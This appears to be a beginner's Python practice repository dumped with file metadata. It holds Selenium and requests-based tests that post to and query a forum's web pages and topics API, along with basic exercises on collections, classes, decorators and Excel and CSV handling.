"repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.common.keys import Keys\ndriver = webdriver.Chrome()\n\n\ndef delete():\n driver.get(\"http://39.107.96.138:3000/signin\")\n\n driver.find_element_by_id('name').send_keys(\"testuser1\")\n driver.find_element_by_id('pass').send_keys('123456')\n\n driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n # 进入个人中心\n driver.find_element_by_css_selector('span[class=\"user_name\"]>a.dark').click()\n # 点击最近创建的第一个话题\n driver.find_element_by_css_selector('div.cell a[class=\"topic_title\"]').click()\n # 点击删除按钮\n driver.find_element_by_css_selector('i[title=\"删除\"]').click()\n\n # 切换alert\n alert = driver.switch_to.alert\n # 获取文本\n alert_text = alert.text\n print(alert_text)\n # 点击确定\n alert.accept()\n\n # 点击取消\n # alert.dismiss()\n\n\n\n'''加帖子'''\ndriver = webdriver.Chrome()\n\ndriver.get(\"http://39.107.96.138:3000/signin\")\n\n\ndriver.find_element_by_id('name').send_keys(\"testuser1\")\ndriver.find_element_by_id('pass').send_keys('123456')\n\ndriver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\ndriver.get('http://39.107.96.138:3000/topic/create')\n\n\nedit = driver.find_element_by_css_selector('div.CodeMirror-scroll')\nedit.click()\n# 定义多个动作 并执行 注意:一定要在最后调用perform()\naction = ActionChains(driver)\naction.move_to_element(edit).send_keys(\"helloworld\").perform()\n# 模拟ctrl a\naction.key_down(Keys.CONTROL)\naction.send_keys('a')\naction.key_up(Keys.CONTROL)\n# 模拟ctrl 
b\naction.key_down(Keys.CONTROL)\naction.send_keys('b')\naction.key_up(Keys.CONTROL)\n\naction.perform()\n\n\n# driver.find_element_by_css_selector('[id=\"tab-value\"]').click()\n# driver.find_element_by_css_selector('option[value=\"job\"]').click()\n\n# 使用Select 类定位元素\n# Select(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_index(1)\n# 通过value值\n# Select(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_value(\"ask\")\n# 通过可见文本值来操作\n\n\n\nSelect(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_visible_text(\"问答\")\n\ndriver.find_element_by_id('title').send_keys(\"123131231231231231\")\n\ndriver.find_element_by_css_selector('input[value=\"提交\"]').click()\n" }, { "alpha_fraction": 0.42181816697120667, "alphanum_fraction": 0.4490908980369568, "avg_line_length": 25.238094329833984, "blob_id": "96722da94a85bd764c28405eee03d823b35eb79c", "content_id": "bf7343ec4e8d345bdc9d9519f710948b3f1f596c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/src/learn/day3_open_file.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "with open('test.txt', 'r+', encoding='utf-8') as f:\n f.seek(1) # 指定当前指针位置\n print(f.tell()) # 按照字符 读取指针位置\n #print(f.read(4)) #读两个字节\n print(f.tell()) # 按照字符\n f.truncate()#截取当前位置,再保存当前文件\n\n\ndef two_question01():\n num = 0\n for i in range(1,5):\n for j in range(1,5):\n for id in range(1,5):\n if i!=j and i!=id and j!=id:\n li = [i, j, id]\n b = [str(n) for n in li]\n print(''.join(b))\n num+=1\n\n print(num)\ntwo_question01()" }, { "alpha_fraction": 0.634482741355896, "alphanum_fraction": 0.682758629322052, "avg_line_length": 17.25, "blob_id": "2637649b7ec7c353835413a31eb35b46ac3d023d", "content_id": "29abaa151dd91be990a7623baa2b01b26b97189e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/src/hanshu/test-diaoyong.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月13日\n\n@author: asus\n'''\nimport diaoyong \ncar = diaoyong.make_car('subaru', 'outback',color = 'black',tow='true')\nprint(car)" }, { "alpha_fraction": 0.49462366104125977, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 27.615385055541992, "blob_id": "7d926447cb80f8dc25dc9c854850a0bef6350e09", "content_id": "441f60666e5631128702767b4f65026a78e1d9ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 107, "num_lines": 39, "path": "/src/test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import requests\n\n\n# url1 = 'http://39.107.96.138:3000/api/v1{}'\n# url2 = '/topics'\n# url = url1.format(url2)\n# response = requests.get(url=url)\n# if response.status_code == 200:\n# print(response.text)\n# else:\n# print('error')\n\ndef result(type1, url2, params):\n url1 = 'http://39.107.96.138:3000/api/v1{}'\n url = url1.format(url2)\n print(url)\n if type1 == 'get':\n response = requests.get(url, params)\n if response.status_code == 200:\n # print(response.text)\n return response.json()\n else:\n print('error')\n return 'error'\n elif type1 == 'post':\n response = requests.post(url, data=params)\n if response.status_code == 200:\n # 
print(response.text)\n return response.json()\n else:\n #print(response.text)\n return 'error'\n\n\nif __name__ == '__main__':\n params = {'page': 1}\n print(result('get', '/topics', params))\n params = {'accessToken': 'c9715651-0d4a-4c50-af79-7fac08110e2a', 'title': 'test11', 'content': 'yyyyy'}\n print(result('post', '/topics', params))\n" }, { "alpha_fraction": 0.5643153786659241, "alphanum_fraction": 0.5933610200881958, "avg_line_length": 17.615385055541992, "blob_id": "fb4eb5b326c9f575a893c644165ec83522ed80c1", "content_id": "e75a1c00db1c75017809a84d4583d3ba36ebab53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 35, "num_lines": 13, "path": "/src/hanshu/diaoyong.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月13日\n\n@author: asus\n'''\ndef make_car(business,type,**info):\n \"\"\"函数调用,被调用方\"\"\"\n build = {}\n build['bus']=business\n build['type']=type\n for key,value in info.items():\n build[key]=value\n return build" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 8.666666984558105, "blob_id": "9fbf48a76dc9f68fca4eff6f527b34ab8e8a1650", "content_id": "8fbfa916077fbd8a9752401d5c71cef2abdc2f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/src/test_1130.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import sys\n\nprint (sys.argv)" }, { "alpha_fraction": 0.5879629850387573, "alphanum_fraction": 0.6018518805503845, "avg_line_length": 11.764705657958984, "blob_id": "1e851c58d71a09048cf3c3104e5c88bdb701ec2f", "content_id": "911834b2a258dcfebfac7027c4dcdda3dcc1c36d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 40, "num_lines": 17, "path": "/src/pytest_v/test_t1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\n文件以test_开始 或者 以 _test结尾的py (test不区分大小写)\n\n\"\"\"\n\ndef test_l():\n\n \"\"\" test开始的函数会被当做测试用例直接执行\"\"\"\n assert True\n\n# content of test_sample.py\ndef inc(x):\n return x + 1\n\n\ndef test_answer():\n assert inc(3) == 5" }, { "alpha_fraction": 0.5099223256111145, "alphanum_fraction": 0.5159620642662048, "avg_line_length": 37.61666488647461, "blob_id": "2a9cf31fa362942e7ccf85700a8849739f9b0e1f", "content_id": "755bbc4b6a78b7dd59b22524e8e9b5a95a746419", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2456, "license_type": "no_license", "max_line_length": 108, "num_lines": 60, "path": "/src/test/selenium_1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome()\ndriver.get('https://www.baidu.com')\n\n# class_name find_element_by_class_name\ndriver.find_element_by_class_name(\"s_ipt\").send_keys('携程')\ntime.sleep(3)\n# driver.find_element_by_xpath('//input[contains(@id,\\'su\\')]').click()\ndriver.find_element_by_xpath('//*[@id=\"su\"]').click()\n\n# id find_element_by_id\n# driver.find_element_by_id('kw').send_keys('seke')\n# -----------------------------------------------------------------------------------------\n\n\n# name find_element_by_name\n# driver.find_element_by_name('wd').send_keys('sale')\n# 
-----------------------------------------------------------------------------------------\n\n\n# xpath find_element_by_xpath 绝对路径\n# driver.find_element_by_xpath('/html/body/div/div/div/div[3]/a').click()\n# -----------------------------------------------------------------------------------------\n\n\n# link_text find_element_by_link_tex 超链接文本\n# driver.find_element_by_link_text(\"新闻\").click()\n# -----------------------------------------------------------------------------------------\n\n\n# partial_link_text find_element_by_partial_link_text\n# driver.find_element_by_partial_link_text(\"新\").click()\n# -----------------------------------------------------------------------------------------\n\n\n# xpath find_element_by_xpath 相对路径\n# 1、标签名+节点属性 [//a[@class= \"s_bri\"]]\n# driver.find_element_by_xpath('//input[@name= \"wd\"]').send_keys('xxx')\n# driver.find_element_by_xpath('//a[@name=\"tj_trhao123\"]').click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\n    '//div[@class=\"ec-pl-padding-bottom-middle ec-pc_small_head-item ec-block-pc_small_head-0\"]//a').click()\n\n# 2、部署属性值匹配//标签名[contains(@属性名,部分属性值)]\n# driver.find_element_by_xpath('//a[contains(@name,\\'rvide\\')]').click()\n\n\n# 3、使用文本匹配 //标签名[contains(@属性名,部分属性值)]\n# driver.find_element_by_xpath('//a[contains(text(),\\'贴吧\\')]').click()\n\n# -----------------------------------------------------------------------------------------\n\n\n# css\ntime.sleep(4)\n# driver.find_element_by_css_selector('form[id=\\'chinaHotelForm\\'] input.w01.inputSel').click()\n# driver.find_element_by_xpath('//form[@id=\\'chinaHotelForm\\']//input[@name=\\'cityId\\']').send_keys(2)\ndriver.find_element_by_css_selector('form[id=\\'chinaHotelForm\\'] input[name=\\'cityId\\']').send_keys('上海')\n\n" }, { "alpha_fraction": 0.5717131495475769, "alphanum_fraction": 0.5836653113365173, "avg_line_length": 21.675676345825195, "blob_id": "74e7c8494f782b5e77e25ac8add5fde56a728506", "content_id": "cc5ee6e7018a2608c6289e485a65da0d7b12dec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1571, "license_type": "no_license", "max_line_length": 84, "num_lines": 74, "path": "/src/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "#input 控制台输入\n\nmessage_1 =\"print\"\nmessage_1 +=\": \"\nmessage = input(message_1)\nprint(message)\n\nage = input(\"how old are you ?\") \nage = int(age)#input为str类型,转换成int\nprint(age>=18)\n\ndouble_1 =input(\"输入数字\")\ndouble_1 = int(double_1)\nif double_1%2 == 0:\n    print(\"双数\")\nelse: \n    print(\"单数\")\n \n \n\n \n#while 循环---------------------------------------------------------------------------\nnumber1 = 1\nwhile number1 <=5:\n    print(number1)\n    number1 +=1\n#选择quit退出\nmessage =\"\"\nactive = True\nwhile active: #定义true\n    message = input(\"prompt:\")\n    if message ==\"quit\":\n        break #退出循环\n#        active = False\n    else:\n        print(message)\n\nnumber = 0\nwhile number <10:\n    number +=1\n    if number %2 ==0:\n        continue #不再执行下方语句\n    print(number)\n\nusers = ['alean' , 'mike' ,'dancy']\nusers_1 = []\nwhile users:\n    user_info = users.pop()\n    print(\"修改:\"+user_info)\n    users_1.append(user_info)\n\nfor user in users_1:\n    print(user)\n \npets =['dog','cat','rabit','cat','goldfish','cat']\nwhile 'cat' in pets:\n    pets.remove('cat')\nprint(pets)\n\n#用户输入补充字典值\nresponses ={}\nwhile True:\n    name = input(\"name:\")\n    response = input(\"结果:\")\n    responses[name] = response  # map each name to its answer\n    repeat = 
input(\"继续?:\")\n if repeat =='quit':\n break\nprint('result: ')\nfor name,response in responses.items():\n print(name +\" \\n\"+ response)" }, { "alpha_fraction": 0.4884765148162842, "alphanum_fraction": 0.5217000842094421, "avg_line_length": 26.38524627685547, "blob_id": "8a5f811ebbaaa9db8fe2000de7004fcd9129d2d5", "content_id": "2b632b6370323422a5f272ca26c58505df8a0df9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3607, "license_type": "no_license", "max_line_length": 109, "num_lines": 122, "path": "/src/beautiful_report/API_test/testapi.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import requests\nimport unittest\nimport ddt\n\n\[email protected]\nclass test_topic_api(unittest.TestCase):\n '''\n 接口测试:数据驱动\n '''\n\n def test_topic(self):\n r = requests.get(url=\"http://39.107.96.138:3000/api/v1/topics?page=1&tab=ask&limit=1&mdrender=true\")\n print(r, type(r))\n # 响应结果 body 文本格式\n text = r.text\n print(\"text:\", type(text), text)\n # 响应结果 body 字典格式\n json = r.json()\n print('json', type(json), json)\n # 响应状态码\n statuscode = r.status_code\n assert statuscode == 200, \"状态码应该为200\"\n\n success = json['success']\n assert success, 'success 应该为True'\n\n # 对data 数据的长度进行断言\n data = json['data']\n assert len(data) == 1, \"响应数据应该只有1条\"\n\n for obj in data:\n assert obj['tab'] == 'ask', \"tab 值应该为ask\"\n\n # 数据驱动\n\n testdata = [\n {\"limit\": 1, \"tab\": \"ask\"},\n {\"limit\": 2, \"tab\": \"share\"},\n {\"limit\": 3, \"tab\": \"job\"},\n {\"limit\": 2, \"tab\": \"good\"}\n ]\n url = 'http://39.107.96.138:3000/api/v1/topics'\n\n @ddt.data(*testdata)\n def test_math(self, value):\n url = 'http://39.107.96.138:3000/api/v1/topics'\n print(type(value), value)\n r = requests.get(url, value)\n json = r.json()\n # 响应状态码\n statuscode = r.status_code\n assert statuscode == 200, \"状态码应该为200\"\n\n success = json['success']\n assert success, 'success 应该为True'\n\n # 对data 数据的长度进行断言\n data = json['data']\n assert len(data) == value['limit'], f\"响应数据应该只有{value['limit']}条\"\n\n for obj in data:\n assert obj['tab'] == value['tab'], f\"tab 值应该为{value['tab']}\"\n\n def test_new_topic(self):\n '''\n 发帖\n :return:\n '''\n baseurl = 'http://39.107.96.138:3000/api/v1'\n url = baseurl + '/topics'\n testdata = {\n \"accesstoken\": \"fc45e11f-6017-41c1-a659-fd5b11bd805d\",\n \"title\": \"1111ssssssss\",\n \"tab\": \"ask\",\n \"content\": \"xxxxxxxxxxxxx\"\n }\n r = requests.post(url=url, data=testdata)\n print(r.json())\n # 请求头信息\n print(r.request.headers)\n json = r.json()\n assert r.status_code == 200\n\n success = json['success']\n assert success\n\n test_topic_api.topic_id = json['topic_id']\n assert test_topic_api.topic_id is not None\n return test_topic_api.topic_id\n\n\n\n\n def test_topic_tt(self):\n '''\n 获取topic\n :return:\n '''\n print(self.topic_id)\n detail_url = 'http://39.107.96.138:3000/api/v1' + '/topic/' + test_topic_api.topic_id\n paramsdata = {'mdrender': 'false'}\n res = requests.get(url=detail_url, params=paramsdata)\n assert res.status_code == 200\n resjson = res.json()\n\n assert resjson['success']\n\n resjsondata = resjson['data']\n testdata = {\n \"accesstoken\": \"fc45e11f-6017-41c1-a659-fd5b11bd805d\",\n \"title\": \"1111ssssssss\",\n \"tab\": \"ask\",\n \"content\": \"xxxxxxxxxxxxx\"\n }\n assert resjsondata['tab'] == testdata[\"tab\"], \"发帖板块应该为\" + testdata['tab']\n assert resjsondata['title'] == testdata[\"title\"], \"发帖标题应该为\" + testdata['title']\n assert resjsondata['content'] == 
testdata[\"content\"], \"发帖内容应该为\" + testdata['content']\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.6460176706314087, "alphanum_fraction": 0.6460176706314087, "avg_line_length": 26.15999984741211, "blob_id": "3523fb19f216769a5966fb4762e2ace7c14ccc7c", "content_id": "0e29740e0c0e9f7f25316a989e9e0dbd6f9bd4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/src/testcase/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom testcase.name_function import get_formatted_name,AnoymoisSurey\nprint(\"Enter 'q' at any time to quit\" )\nwhile True:\n first = input(\"first: \")\n if first == 'q':\n break\n last = input(\"last: \")\n if last == 'q':\n break\n formatted_name = get_formatted_name(first, last)\n print('formatted_name:\\t' + formatted_name)\n\nquestion= \"What are you learn?\" #定义问题,创建对象\nmy_surver = AnoymoisSurey(question)\nmy_surver.show_question()\nprint(\"Enter 'q' at any time to quit\")\nwhile True:\n response = input(\"result: \")\n if response == 'q':\n break\n my_surver.store_response(response)\nprint(\"显示结果:\")\nmy_surver.show_results()" }, { "alpha_fraction": 0.5828025341033936, "alphanum_fraction": 0.6019108295440674, "avg_line_length": 21.428571701049805, "blob_id": "2ff7b7cf099e98343400d97a808f85430e772854", "content_id": "3a5cf694ab160b9cb19d25dc1caf00625450e34e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/src/pytest_v/testcase/testTime.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import time\nfrom time import strftime\ndef func():\n starttime = time.perf_counter()\n for x in range(10):\n time.sleep(0.1)\n endtime = time.perf_counter()\n print(f'时间{endtime - starttime}')\n\ndef fun1():\n return strftime('%Y_%M_%d',time.localtime())\n\nif __name__ == '__main__':\n print(fun1())\n" }, { "alpha_fraction": 0.621411919593811, "alphanum_fraction": 0.6377036571502686, "avg_line_length": 35.82857131958008, "blob_id": "f696f0d5beb6de83a891faf8a54b6b9c6c4b05e0", "content_id": "9c4b63abef5a311b1c577b49f29ba3752dcda0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/src/class_1/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\n\nfrom class_1.class1 import Car,ElectriCar\n# my_dog = Dog('white',6)\n# her_dog=Dog('red',3)\n# print ('name:'+my_dog.name + 'age:'+ str(my_dog.age))\n# my_dog.sit()\n# my_dog.roll_over()\n# her_dog.sit()\n# her_dog.roll_over()\n#class类-----------------------------------------------------------------------------------------------------------\nmy_new_car= Car('audi','24',2016)\nprint(my_new_car.get_descriptive_name())\nmy_new_car.odometer_reading = 23 #修改默认值\nmy_new_car.read_odometer()\nmy_new_car.update_odometer(30) #调用方法更新里程数\nmy_new_car.read_odometer()\nmy_new_car.increment_odmeter(3)\nmy_new_car.read_odometer()\n#子父类调用--------------------------------\nmy_tesla = ElectriCar('tesla','model_s',2016)\nprint(my_tesla.get_descriptive_name())\nmy_tesla.describe_battery()\nmy_tesla.fill_gas()\nmy_tesla.battery_size.describe_battery() # 调用ElectriCar 
属性的battery_size ,调用Battery()\nmy_tesla.battery_size.get_rang() #获取里程数\nmy_tesla.battery_size.battery_size = 85 #调用Battery() 修改电池属性\nmy_tesla.battery_size.get_rang()\n#OrderedDict 创建空字典\nfavorite_language = OrderedDict()\nfavorite_language['jen']='python'\nfavorite_language['aa']='c'\nfavorite_language['cc']='java'\nfor name,language in favorite_language.items():\n print(name.title()+language.title())\n" }, { "alpha_fraction": 0.5258192420005798, "alphanum_fraction": 0.532274067401886, "avg_line_length": 29.530303955078125, "blob_id": "49aa79c922b120b861fb356078111dcf829c360c", "content_id": "d1958621b27176b6341aeccf92a662a108091207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2380, "license_type": "no_license", "max_line_length": 64, "num_lines": 66, "path": "/src/class_1/class1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Dog():\n def __init__(self,name,age):\n \"\"\"\"一次模拟小狗的尝试\"\"\"\n \"\"\"\"初始化属性name和age\"\"\"\n self.name = name\n self.age = age\n\n def sit(self):\n \"\"\"\"模拟小狗命令蹲下\"\"\"\n print (self.name.title()+\" is now sitting\")\n def roll_over(self):\n \"\"\"模拟小狗命令时打滚\"\"\"\n print (self.name.title()+\" rolled over\")\n\n\nclass Car():\n \"\"\"\"一次模拟汽车\"\"\"\n def __init__(self,make,model,year):\n \"\"\"初始化汽车属性\"\"\"\n self.make = make\n self.model =model\n self.year =year\n self.odometer_reading=0 #添加默认值\n def get_descriptive_name(self):\n \"\"\"获取完整信息\"\"\"\n long_name = str(self.year)+' '+self.make+' '+self.model\n return long_name.title()\n def read_odometer(self):\n \"\"\"打印里程书\"\"\"\n print('里程数'+str(self.odometer_reading))\n def update_odometer(self,mileage):\n \"\"\"更新里程数且禁止将里程数回调\"\"\"\n if(self.odometer_reading<mileage):\n self.odometer_reading=mileage\n else:\n print(\"You can't roll back an odometer\")\n def increment_odmeter(self,mailes):\n \"\"\"将里程数增加指定值\"\"\"\n self.odometer_reading += mailes\nclass ElectriCar(Car):\n \"\"\"电动汽车的独特之处\"\"\"\n def __init__(self,make,model,year): #创建实例\n \"\"\"初始化父类属性,初始化子类属性\"\"\"\n super().__init__(make,model,year) #super 使实例有父类的属性\n self.battery_size = Battery()\n def describe_battery(self):\n print(str(self.battery_size))\n def fill_gas(self):\n print(\"有油布\")\n def fill_gas(self): #方法重写\n print(\"没油了\")\nclass Battery():\n \"\"\"模拟电动车电瓶\"\"\"\n def __init__(self,battery_size=60): #初始化子类特有属性\n \"\"\"初始化电瓶属性\"\"\"\n self.battery_size=battery_size\n def describe_battery(self):\n \"\"\"打印电瓶属性\"\"\"\n print(\" test\"+str(self.battery_size))\n def get_rang(self):\n \"\"\"打印信息,指出电瓶续航里程数\"\"\"\n if self.battery_size == 60:\n range= 180\n elif self.battery_size == 85:\n range =270\n print(\"续航里程数:\"+str(range))" }, { "alpha_fraction": 0.6012510061264038, "alphanum_fraction": 0.6161063313484192, "avg_line_length": 14.802469253540039, "blob_id": "5ad78ae61c16e06f42e933b72158ed729b580509", "content_id": "eac6b264ed27f414cb7bfbe5dcb605127d574883", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 44, "num_lines": 81, "path": "/src/learn/day4_装饰器.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def login(func):\n def inner(*arg, **kwargs):\n print('passed user version...')\n return func(*arg, **kwargs)\n\n return inner\n\n\n# 无参数的,返回内存地址。不调用tv\n@login\ndef home_page(name):\n print('Welcome %s to home page' % name)\n\n\n@login\ndef tv(name, password=123):\n print('Welcome %s to TV page' % name)\n return 
4\n\n\n@login\ndef movie(name):\n    print('Welcome %s to MOVIE page' % name)\n\n\n# tv = login(tv)\ntv('alex', password=456)\nprint(tv)\nmovie('alex')\n\n\n# !/usr/bin/env python\n# coding:utf-8\n\ndef Before(request, kargs):\n    print('before')\n\n\ndef After(request, kargs):\n    print('after')\n\n\ndef Filter(before_func, after_func):\n    def outer(main_func):\n        def wrapper(request, kargs):\n            before_func(request, kargs)\n\n            main_func(request, kargs)\n\n            after_func(request, kargs)\n\n        return wrapper\n\n    return outer\n\n\n@Filter(Before, After)\ndef Index(request, kargs):\n    print('index')\n\n\nIndex('rpr', 'alex')\n\n\ndef w1(main_func):\n    def outer1(request, kargs):\n        print('before1')\n        main_func(request, kargs)\n        print('after1')\n    return outer1\n\n\n@w1\ndef show(request, kargs):\n    print('show1')\n\n# applying @w1 executes w1 with the decorated function as its argument: w1(show)\n# show is then rebound to the return value of w1(show)\n# the new show = def outer1(request, kargs)\n\nshow('rpr', 'alex')" },
{ "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.737500011920929, "avg_line_length": 15.066666603088379, "blob_id": "9bc1985d2c279ccee240175f76ae48398c23d6e0", "content_id": "47465a4b678d0f4992e254ee72d0bc49edfa447e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/src/pytest_v/testcase/testopenpyxl.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from openpyxl import Workbook\n# instantiate a Workbook object\nworkbook = Workbook()\n# get the active worksheet\nworksheet = workbook.active\n\n\nworksheet['A1'] = 'a1'\nworksheet['B1'] = 'b1'\n\nprint(worksheet.title)# sheet name\n\nworksheet.title = '测试1'\n\nworkbook.save(filename='testexl.xls')" },
{ "alpha_fraction": 0.5717131495475769, "alphanum_fraction": 0.5836653113365173, "avg_line_length": 22.904762268066406, "blob_id": "3a6ef16b335ce034cf3a69233497e144952d385f", "content_id": "2415e57c70ad2eab848387420d89732c067a9bc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 93, "num_lines": 42, "path": "/src/pytest_v/common/do_data.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import csv\nfrom openpyxl import load_workbook\n'''\nparse the data files\n'''\n\ndef do_csv(csvpath):\n    data = []\n    with open(csvpath,mode='r',encoding='utf8') as f:\n        reader = csv.reader(f)\n        next(reader)\n        for line in reader:\n            print(line)\n            data.append(tuple(line))\n\n    return data\n\ndef do_xls(xlspath):\n    workbook = load_workbook(filename=xlspath)\n    # sheetnames: the list of sheet names\n    sheet_name = workbook.sheetnames\n    # the worksheet currently in use\n    worksheet = workbook['测试1']\n\n    # collect the xlsx data, approach 1\n    # data = []\n    # testdata= []\n    # for i in range(1,4):\n    #     for x in range(1,4):\n    #         data.append(worksheet.cell(row=i,column=x).value)\n    #     testdata.append(tuple(data))\n    # collect the xlsx data, approach 2\n    testdata=[]\n    for row in worksheet.iter_rows(min_col=0,max_col=3,min_row=0,max_row=3,values_only=True):\n        # print(row)\n        testdata.append(row)\n\n    return testdata\n\nif __name__ == '__main__':\n    #print(do_csv('../data/data.csv'))\n    print(do_xls('../data/test.xlsx'))\n" },
{ "alpha_fraction": 0.5454817414283752, "alphanum_fraction": 0.6065230369567871, "avg_line_length": 17.059459686279297, "blob_id": "c7cd5ca8b370158a120893bafd46b1070bde6188", "content_id": "fa6328d4d3046db1de06f699447b02b98856a163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3794, "license_type": "no_license", "max_line_length": 66, "num_lines": 185, "path": "/src/learn/day3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "s1 = set() # sets prevent duplicates\ns1.add('alex') # add\nprint(s1)\ns1.add('alex')\nprint(s1)\n\ns2 = s1.copy() # copy\nprint(s2)\n\ns3 = set(['alex', 'eric', 'tony', 'alex']) # duplicates in the list are removed automatically\nprint(s3)\n\ns4 = s3.difference(['alex', 'eric'])\nprint(s4) # print the differing values\n\ns4 = s3.difference_update(['alex', 'eric'])\n\nret = s3.pop()\nprint(s3)\n\nold_dict = {\n    \"#1\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n    \"#2\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n    \"#3\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80}\n}\n\n# data newly reported by the cmdb\nnew_dict = {\n    \"#1\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 800},\n    \"#3\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n    \"#4\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80}\n}\n'''find the data in old_dict that needs updating'''\n# intersection: the keys to update\nold = set(old_dict.keys())\nnew = set(new_dict.keys())\nupdate_set = old.intersection(new)\nprint(update_set)\n# difference: the keys that should be removed\ndelete_set = old.symmetric_difference(update_set) # the set of keys to delete\n# delete_set = old.difference(update_set)\nprint(delete_set)\n\nadd_set = new.symmetric_difference(update_set) # the set of keys to add\nprint(add_set)\n\n# compare difference and symmetric_difference\ns1 = set([11, 22, 33])\ns2 = set([22, 44])\nret1 = s1.difference(s2) # one-sided difference\nret2 = s1.symmetric_difference(s2) # two-sided difference\nprint(ret1)\nprint(ret2)\n\nfrom collections import Counter\n\nobj1 = Counter('aaaabbbasbdasbdabdasbdadsb,b') # counter\nprint(obj1)\n\nret = obj1.most_common(4) # the 4 most common elements\nprint(ret)\n\nt = [k for k in obj1.elements()] # get all elements\nprint(t)\n\nfor k, v in obj1.items():\n    print(k, v)\n\nobj = Counter(['11', '22', '33'])\nprint(obj)\nobj.update(['eric', '11', '11'])\nprint(obj)\nobj.subtract(['eric', '11', '11'])\n\n# ordered dictionary\n\nfrom collections import OrderedDict\n\ndic = OrderedDict()\ndic['k1'] = 'v1'\ndic['k2'] = 'v2'\ndic['k3'] = 'k3'\ndic.setdefault('k4', '66') # default value\nprint(dic)\n\n# dic.move_to_end('k1') # move to the end\n# print(dic)\n\ndic.popitem() # LIFO: removes the last item\nprint(dic)\n\ndic.update({'k1': 'v111', 'k10': 'v10'})\nprint(dic)\n\n# dictionary with default values\nfrom collections import defaultdict\n\nmy_dict = defaultdict(list)\nmy_dict['k1'].append('v1')\nprint(my_dict)\n\nb = []\na = [4, 1, 2, 6, 5, 7]\nfor i in a:\n    if not b:\n        b.append(i)\n    if i > b[-1]:\n        b.append(i)\nprint(b)\n\n# named tuple\nfrom collections import namedtuple\n\nMytuple = namedtuple('Mytuple', ['x', 'y', 'c'])\nobj = Mytuple(11, 22, 33)\nprint(obj.x)\nprint(obj.y)\nprint(obj.c)\n\n# double-ended queue\nfrom collections import deque\n\nd = 